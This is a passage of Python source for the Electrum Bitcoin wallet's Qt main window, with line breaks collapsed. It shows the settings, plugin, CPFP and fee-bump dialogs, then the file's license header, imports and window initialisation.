HelpLabel(_('Video Device') + ':', msg) qr_combo.setEnabled(qrscanner.libzbar is not None) on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True) qr_combo.currentIndexChanged.connect(on_video_device) gui_widgets.append((qr_label, qr_combo)) colortheme_combo = QComboBox() colortheme_combo.addItem(_('Light'), 'default') colortheme_combo.addItem(_('Dark'), 'dark') index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default')) colortheme_combo.setCurrentIndex(index) colortheme_label = QLabel(_('Color theme') + ':') def on_colortheme(x): self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True) self.need_restart = True colortheme_combo.currentIndexChanged.connect(on_colortheme) gui_widgets.append((colortheme_label, colortheme_combo)) updatecheck_cb = QCheckBox(_("Automatically check for software updates")) updatecheck_cb.setChecked(self.config.get('check_updates', False)) def on_set_updatecheck(v): self.config.set_key('check_updates', v == Qt.Checked, save=True) updatecheck_cb.stateChanged.connect(on_set_updatecheck) gui_widgets.append((updatecheck_cb, None)) filelogging_cb = QCheckBox(_("Write logs to file")) filelogging_cb.setChecked(bool(self.config.get('log_to_file', False))) def on_set_filelogging(v): self.config.set_key('log_to_file', v == Qt.Checked, save=True) self.need_restart = True filelogging_cb.stateChanged.connect(on_set_filelogging) filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.')) gui_widgets.append((filelogging_cb, None)) usechange_cb = QCheckBox(_('Use change addresses')) usechange_cb.setChecked(self.wallet.use_change) if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False) def on_usechange(x): usechange_result = x == Qt.Checked if self.wallet.use_change != usechange_result: self.wallet.use_change = usechange_result self.wallet.storage.put('use_change', self.wallet.use_change) multiple_cb.setEnabled(self.wallet.use_change) usechange_cb.stateChanged.connect(on_usechange) usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.')) tx_widgets.append((usechange_cb, None)) def on_multiple(x): multiple = x == Qt.Checked if self.wallet.multiple_change != multiple: self.wallet.multiple_change = multiple self.wallet.storage.put('multiple_change', multiple) multiple_change = self.wallet.multiple_change multiple_cb = QCheckBox(_('Use multiple change addresses')) multiple_cb.setEnabled(self.wallet.use_change) multiple_cb.setToolTip('\n'.join([ _('In some cases, use up to 3 change addresses in order to break ' 'up large coin amounts and obfuscate the recipient address.'), _('This may result in higher transactions fees.') ])) multiple_cb.setChecked(multiple_change) multiple_cb.stateChanged.connect(on_multiple) tx_widgets.append((multiple_cb, None)) def fmt_docs(key, klass): lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")] return '\n'.join([key, "", " ".join(lines)]) choosers = sorted(coinchooser.COIN_CHOOSERS.keys()) if len(choosers) > 1: chooser_name = coinchooser.get_name(self.config) msg = _('Choose coin (UTXO) selection method. The following are available:\n\n') msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items()) chooser_label = HelpLabel(_('Coin selection') + ':', msg) chooser_combo = QComboBox() chooser_combo.addItems(choosers) i = choosers.index(chooser_name) if chooser_name in choosers else 0 chooser_combo.setCurrentIndex(i) def on_chooser(x): chooser_name = choosers[chooser_combo.currentIndex()] self.config.set_key('coin_chooser', chooser_name) chooser_combo.currentIndexChanged.connect(on_chooser) tx_widgets.append((chooser_label, chooser_combo)) def on_unconf(x): self.config.set_key('confirmed_only', bool(x)) conf_only = self.config.get('confirmed_only', False) unconf_cb = QCheckBox(_('Spend only confirmed coins')) unconf_cb.setToolTip(_('Spend only confirmed inputs.')) unconf_cb.setChecked(conf_only) unconf_cb.stateChanged.connect(on_unconf) tx_widgets.append((unconf_cb, None)) def on_outrounding(x): self.config.set_key('coin_chooser_output_rounding', bool(x)) enable_outrounding = self.config.get('coin_chooser_output_rounding', False) outrounding_cb = QCheckBox(_('Enable output value rounding')) outrounding_cb.setToolTip( _('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' + _('This might improve your privacy somewhat.') + '\n' + _('If enabled, at most 100 satoshis might be lost due to this, per transaction.')) outrounding_cb.setChecked(enable_outrounding) outrounding_cb.stateChanged.connect(on_outrounding) tx_widgets.append((outrounding_cb, None)) # Fiat Currency hist_checkbox = QCheckBox() hist_capgains_checkbox = QCheckBox() fiat_address_checkbox = QCheckBox() ccy_combo = QComboBox() ex_combo = QComboBox() def update_currencies(): if not self.fx: return currencies = sorted(self.fx.get_currencies(self.fx.get_history_config())) ccy_combo.clear() ccy_combo.addItems([_('None')] + currencies) if self.fx.is_enabled(): ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency())) def update_history_cb(): if not self.fx: return hist_checkbox.setChecked(self.fx.get_history_config()) hist_checkbox.setEnabled(self.fx.is_enabled()) def update_fiat_address_cb(): if not self.fx: return fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config()) def update_history_capgains_cb(): if not self.fx: return hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config()) hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked()) def update_exchanges(): if not self.fx: return b = self.fx.is_enabled() ex_combo.setEnabled(b) if b: h = self.fx.get_history_config() c = self.fx.get_currency() exchanges = self.fx.get_exchanges_by_ccy(c, h) else: exchanges = self.fx.get_exchanges_by_ccy('USD', False) ex_combo.blockSignals(True) ex_combo.clear() ex_combo.addItems(sorted(exchanges)) ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange())) ex_combo.blockSignals(False) def on_currency(hh): if not self.fx: return b = bool(ccy_combo.currentIndex()) ccy = str(ccy_combo.currentText()) if b else None self.fx.set_enabled(b) if b and ccy != self.fx.ccy: self.fx.set_currency(ccy) update_history_cb() update_exchanges() self.update_fiat() def on_exchange(idx): exchange = str(ex_combo.currentText()) if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name(): self.fx.set_exchange(exchange) def on_history(checked): if not self.fx: return self.fx.set_history_config(checked) update_exchanges() self.history_model.refresh('on_history') if self.fx.is_enabled() and checked: self.fx.trigger_update() update_history_capgains_cb() def on_history_capgains(checked): if not self.fx: return self.fx.set_history_capital_gains_config(checked) self.history_model.refresh('on_history_capgains') def on_fiat_address(checked): if not self.fx: return self.fx.set_fiat_address_config(checked) self.address_list.refresh_headers() self.address_list.update() update_currencies() update_history_cb() update_history_capgains_cb() update_fiat_address_cb() update_exchanges() ccy_combo.currentIndexChanged.connect(on_currency) hist_checkbox.stateChanged.connect(on_history) hist_capgains_checkbox.stateChanged.connect(on_history_capgains) fiat_address_checkbox.stateChanged.connect(on_fiat_address) ex_combo.currentIndexChanged.connect(on_exchange) fiat_widgets = [] fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo)) fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox)) fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox)) fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox)) fiat_widgets.append((QLabel(_('Source')), ex_combo)) tabs_info = [ (fee_widgets, _('Fees')), (tx_widgets, _('Transactions')), (gui_widgets, _('General')), (fiat_widgets, _('Fiat')), (id_widgets, _('Identity')), ] for widgets, name in tabs_info: tab = QWidget() grid = QGridLayout(tab) grid.setColumnStretch(0,1) for a,b in widgets: i = grid.rowCount() if b: if a: grid.addWidget(a, i, 0) grid.addWidget(b, i, 1) else: grid.addWidget(a, i, 0, 1, 2) tabs.addTab(tab, name) vbox.addWidget(tabs) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) # run the dialog d.exec_() if self.fx: self.fx.trigger_update() self.alias_received_signal.disconnect(set_alias_color) run_hook('close_settings_dialog') if self.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() if self.network: self.network.unregister_callback(self.on_network) self.network.unregister_callback(self.on_quotes) self.network.unregister_callback(self.on_history) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.storage.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.config.set_key("console-history", self.console.history[-50:], True) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p, name, i): widget = settings_widgets.get(name) if not widget and p and p.requires_settings(): widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) if widget: widget.setEnabled(bool(p and p.is_enabled())) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp(self, parent_tx, new_tx): total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_fee = self.wallet.get_tx_fee(parent_tx) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): out_amt = max_fee - fee_e.get_amount() out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_e.get_amount() comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_('Can't CPFP'')}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee > max_fee: self.show_error(_('Max fee exceeded')) return new_tx = self.wallet.cpfp(parent_tx, fee) new_tx.set_rbf(True) self.show_transaction(new_tx) def bump_fee_dialog(self, tx): fee = self.wallet.get_tx_fee(tx) if fee is None: self.show_error(_("Can't bump fee: unknown fee for original transaction.")) return tx_label = self.wallet.get_label(tx.txid()) tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Bump Fee')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool."))) vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit())) vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate))) vbox.addWidget(QLabel(_('New Fee rate') + ':')) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1)) feerate_e.textEdited.connect(on_textedit_rate) vbox.addWidget(feerate_e) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_slider.deactivate() vbox.addWidget(fee_slider) cb = QCheckBox(_('Final')) vbox.addWidget(cb) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return is_final = cb.isChecked() new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config) except CannotBumpFee as e: self.show_error(str(e)) return if is_final: new_tx.set_rbf(False) self.show_transaction(new_tx, tx_label) def save_transaction_into_wallet(self, tx): win = self.top_level_window() try: if not self.wallet.add_transaction(tx.txid(), tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.storage.write() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys import time import threading import os import traceback import json import shutil import weakref import webbrowser import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QMenu, QSizePolicy, QStatusBar) import electrum from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands, coinchooser, paymentrequest) from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS from electrum.plugin import run_hook from electrum.i18n import _ from electrum.util import (format_time, format_satoshis, format_fee_satoshis, format_satoshis_plain, NotEnoughFunds, UserCancelled, NoDynamicFeeEstimates, profiler, export_meta, import_meta, bh2u, bfh, InvalidPassword, base_units, base_units_list, base_unit_name_to_decimal_point, decimal_point_to_base_unit_name, quantize_feerate, UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI) from electrum.transaction import Transaction, TxOutput from electrum.address_synchronizer import AddTransactionException from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet, sweep_preparations, InternalAddressCorruption) from electrum.version import ELECTRUM_VERSION from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed from electrum.exchange_rate import FxThread from electrum.simple_config import SimpleConfig from electrum.logging import Logger from electrum.paymentrequest import PR_PAID from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values, ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui, filename_field, address_field) from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread class StatusBarButton(QPushButton): def __init__(self, icon, tooltip, func): QPushButton.__init__(self, icon, '') self.setToolTip(tooltip) self.setFlat(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() new_fx_quotes_signal = pyqtSignal() new_fx_history_signal = pyqtSignal() network_signal = pyqtSignal(str, object) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() def __init__(self, gui_object, wallet: Abstract_Wallet): QMainWindow.__init__(self) self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network assert wallet, "no wallet" self.wallet = wallet self.fx = gui_object.daemon.fx # type: FxThread self.invoices = wallet.invoices self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.checking_accounts = False self.qr_window = None self.not_enough_funds = False self.pluginsdialog = None self.require_fee_update = False self.tl_windows = [] self.tx_external_keypairs = {} Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT) try: decimal_point_to_base_unit_name(self.decimal_point) except UnknownBaseUnit: self.decimal_point = DECIMAL_POINT_DEFAULT self.num_zeros = int(config.get('num_zeros', 0)) self.completions = QStringListModel() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) self.new_fx_quotes_signal.connect(self.on_fx_quotes) self.new_fx_history_signal.connect(self.on_fx_history) # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread(self) self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def on_history(self, b): self.wallet.clear_coin_price_cache() self.new_fx_history_signal.emit() def setup_exception_hook(self): Exception_Hook(self) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_quotes(self, b): self.new_fx_quotes_signal.emit() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(str(e)) def on_network(self, event, *args): if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']: # Handle in GUI thread self.network_signal.emit(event, args) else: self.logger.info(f"unexpected network message: {event} {args}") def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True elif event == 'fee_histogram': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True self.history_model.on_fee_histogram() else: self.logger.info(f"unexpected network_qt signal: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum Testnet" if constants.net.TESTNET else "Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked 